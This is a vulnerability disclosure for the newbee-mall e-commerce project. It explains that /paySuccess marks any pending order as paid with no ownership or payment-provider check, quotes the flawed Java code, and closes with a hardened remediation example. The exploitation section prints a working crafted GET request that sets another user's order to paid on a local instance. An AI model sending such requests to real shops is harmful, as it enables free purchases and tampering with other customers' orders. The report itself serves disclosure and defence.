
Critical Payment Vulnerability (IDOR) in /paySuccess of newbee-mall #100

@ez-lbz


Summary

In newbee-mall, the /paySuccess endpoint contains a critical payment vulnerability. It takes orderNo and payType from the client request and updates the order's status in the database directly, without any proof that a payment actually took place. As a result, an attacker can mark arbitrary orders as paid simply by sending a crafted request.

In addition, the endpoint suffers from horizontal privilege escalation (IDOR): nothing ties the orderNo to the logged-in user, so one user can change the payment status of other users' orders, compromising the integrity of the entire transaction system.

Analysis

Reviewing the OrderController class shows that the paySuccess method contains no authorization or payment-verification logic: it passes the client-supplied orderNo and payType straight to the service layer.

    @GetMapping("/paySuccess")
    @ResponseBody
    public Result paySuccess(@RequestParam("orderNo") String orderNo, @RequestParam("payType") int payType) {
        // orderNo and payType come straight from the query string; no ownership or provider check
        String payResult = newBeeMallOrderService.paySuccess(orderNo, payType);
        if (ServiceResultEnum.SUCCESS.getResult().equals(payResult)) {
            return ResultGenerator.genSuccessResult();
        } else {
            return ResultGenerator.genFailResult(payResult);
        }
    }

Following into NewBeeMallOrderServiceImpl.paySuccess, no authorization checks are present there either. The only guard is that the order is currently in the pending-payment state (ORDER_PRE_PAY); there is no check that the order belongs to the caller, and no confirmation from any payment provider.

    @Override
    public String paySuccess(String orderNo, int payType) {
        NewBeeMallOrder newBeeMallOrder = newBeeMallOrderMapper.selectByOrderNo(orderNo);
        if (newBeeMallOrder != null) {
            // Order status check: only orders in the pending-payment state are modified
            if (newBeeMallOrder.getOrderStatus().intValue() != NewBeeMallOrderStatusEnum.ORDER_PRE_PAY.getOrderStatus()) {
                return ServiceResultEnum.ORDER_STATUS_ERROR.getResult();
            }
            // No check that the order belongs to the current user, and no provider verification:
            // the order is marked paid purely on the strength of the client's request
            newBeeMallOrder.setOrderStatus((byte) NewBeeMallOrderStatusEnum.ORDER_PAID.getOrderStatus());
            newBeeMallOrder.setPayType((byte) payType);
            newBeeMallOrder.setPayStatus((byte) PayStatusEnum.PAY_SUCCESS.getPayStatus());
            newBeeMallOrder.setPayTime(new Date());
            newBeeMallOrder.setUpdateTime(new Date());
            if (newBeeMallOrderMapper.updateByPrimaryKeySelective(newBeeMallOrder) > 0) {
                return ServiceResultEnum.SUCCESS.getResult();
            } else {
                return ServiceResultEnum.DB_ERROR.getResult();
            }
        }
        return ServiceResultEnum.ORDER_NOT_EXIST_ERROR.getResult();
    }

This confirms the vulnerability: anyone who can reach the endpoint and knows (or guesses) an orderNo can move that order from ORDER_PRE_PAY to ORDER_PAID with a single GET request and choose the recorded payType.

Exploitation

Log in with a normal user account, e.g., the demo account 13700002703/123456, and send a crafted request to /paySuccess with another user's orderNo (here 15692218454123239; the attacker's own pending order shown in the Referer is 15689090398492576):

GET /paySuccess?payType=2&orderNo=15692218454123239 HTTP/1.1
Host: localhost:28089
Sec-Fetch-Dest: empty
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: */*
sec-ch-ua-mobile: ?0
Cookie: JSESSIONID=6C4975A8A36CAD2F1A5288233A2F4102
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Sec-Fetch-Mode: cors
Referer: http://localhost:28089/payPage?orderNo=15689090398492576&payType=2
Accept-Encoding: gzip, deflate, br, zstd
X-Requested-With: XMLHttpRequest

Checking the database shows that the targeted order now appears as paid, with payment type "微信支付" (WeChat Pay, payType=2), verifying the vulnerability.

Impact

  • Zero-cost purchases by marking arbitrary orders (including the attacker's own) as paid

  • Horizontal privilege escalation enabling attackers to modify other users' orders

  • Loss of integrity of the whole transaction system: order and payment state can no longer be trusted

Remediation

An order should be marked as paid only from a trusted payment provider callback (e.g., a WeChat Pay or Alipay notification) whose signature has been verified on the server, and only after checking that the notified amount equals the order's total; the client-supplied orderNo and payType must never drive the state change. On client-facing order endpoints, additionally bind the orderNo to the logged-in user (compare the order's userId with the session user) so that one user cannot act on another user's orders. The ownership check alone is not sufficient: without provider verification a user can still mark their own orders as paid for free.
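The following is an added example of such a hardened design, written for this write-up and not taken from newbee-mall. It keeps the original state machine but only reaches it from a provider notification whose HMAC-SHA256 signature and amount have been verified, and it adds an ownership check on the client-facing endpoint. Everything beyond the identifiers already shown on this page is an assumption: Constants.MALL_USER_SESSION_KEY holding a NewBeeMallUserVO with getUserId(), NewBeeMallOrder.getUserId() and getTotalPrice(), the pay.notify.secret property, the javax.servlet package, and the signing scheme itself (a real WeChat Pay or Alipay integration would call the provider SDK's verifier in place of verifySignature()).

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Date;
import java.util.Map;
import java.util.TreeMap;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.http.HttpSession;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

// Added example, not newbee-mall's own code. Assumed (not on the page):
// Constants.MALL_USER_SESSION_KEY / NewBeeMallUserVO.getUserId(),
// NewBeeMallOrder.getUserId() / getTotalPrice(), the pay.notify.secret property,
// and a provider that signs the sorted "k=v&..." string with HMAC-SHA256.
@RestController
public class HardenedPayController {

    private final NewBeeMallOrderMapper orderMapper;
    private final byte[] notifySecret;   // shared with the provider; never taken from a request

    public HardenedPayController(NewBeeMallOrderMapper orderMapper,
                                 @Value("${pay.notify.secret}") String notifySecret) {
        this.orderMapper = orderMapper;
        this.notifySecret = notifySecret.getBytes(StandardCharsets.UTF_8);
    }

    /** Client-facing (IDOR fix): succeeds only for an order owned by the session user, changes nothing. */
    @GetMapping("/payPage")
    public Result payPage(@RequestParam("orderNo") String orderNo, HttpSession session) {
        NewBeeMallUserVO user = (NewBeeMallUserVO) session.getAttribute(Constants.MALL_USER_SESSION_KEY);
        if (user == null) {
            return ResultGenerator.genFailResult("login required");
        }
        NewBeeMallOrder order = orderMapper.selectByOrderNo(orderNo);
        // One response for "no such order" and "not your order": no oracle for enumerating orderNo values.
        if (order == null || !user.getUserId().equals(order.getUserId())) {
            return ResultGenerator.genFailResult(ServiceResultEnum.ORDER_NOT_EXIST_ERROR.getResult());
        }
        return ResultGenerator.genSuccessResult();   // the page then hands the user to the provider
    }

    /** Provider callback: unauthenticated by design, so the verified signature is the only authority. */
    @PostMapping("/payNotify")
    public String payNotify(@RequestParam Map<String, String> params) throws Exception {
        Map<String, String> signed = new TreeMap<>(params);   // sorted keys give the canonical order
        String sign = signed.remove("sign");
        if (sign == null || !verifySignature(signed, sign)) {
            return "FAIL";                                     // forged or tampered notification
        }
        String result = markPaidFromVerifiedNotification(
                signed.get("orderNo"), Integer.parseInt(signed.get("payType")), signed.get("amount"));
        return ServiceResultEnum.SUCCESS.getResult().equals(result) ? "SUCCESS" : "FAIL";
    }

    boolean verifySignature(Map<String, String> sortedParams, String sign) throws Exception {
        StringBuilder canonical = new StringBuilder();
        for (Map.Entry<String, String> e : sortedParams.entrySet()) {
            canonical.append(e.getKey()).append('=').append(e.getValue()).append('&');
        }
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(notifySecret, "HmacSHA256"));
        StringBuilder hex = new StringBuilder();
        for (byte b : mac.doFinal(canonical.toString().getBytes(StandardCharsets.UTF_8))) {
            hex.append(String.format("%02x", b));
        }
        // Constant-time comparison: no timing oracle on the signature bytes.
        return MessageDigest.isEqual(hex.toString().getBytes(StandardCharsets.UTF_8),
                                     sign.getBytes(StandardCharsets.UTF_8));
    }

    /** Same state machine as the original paySuccess, reachable only after the signature check. */
    String markPaidFromVerifiedNotification(String orderNo, int payType, String paidAmount) {
        NewBeeMallOrder order = orderMapper.selectByOrderNo(orderNo);
        if (order == null) {
            return ServiceResultEnum.ORDER_NOT_EXIST_ERROR.getResult();
        }
        // The status guard doubles as replay protection: a re-delivered notification is a no-op.
        if (order.getOrderStatus().intValue() != NewBeeMallOrderStatusEnum.ORDER_PRE_PAY.getOrderStatus()) {
            return ServiceResultEnum.ORDER_STATUS_ERROR.getResult();
        }
        // The notified amount must equal the order total: paying the provider a smaller sum
        // against this orderNo must not settle the order.
        if (!String.valueOf(order.getTotalPrice()).equals(paidAmount)) {
            return "AMOUNT_MISMATCH";   // assumed message; not a ServiceResultEnum value shown on the page
        }
        order.setOrderStatus((byte) NewBeeMallOrderStatusEnum.ORDER_PAID.getOrderStatus());
        order.setPayType((byte) payType);
        order.setPayStatus((byte) PayStatusEnum.PAY_SUCCESS.getPayStatus());
        order.setPayTime(new Date());
        order.setUpdateTime(new Date());
        return orderMapper.updateByPrimaryKeySelective(order) > 0
                ? ServiceResultEnum.SUCCESS.getResult()
                : ServiceResultEnum.DB_ERROR.getResult();
    }
}
```

With this split the original GET /paySuccess disappears entirely: the browser never tells the server that a payment succeeded, the provider does, and the provider's message is useless to an attacker without the secret. The ownership check on /payPage is still needed so that one user cannot obtain a payment page for another user's order.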
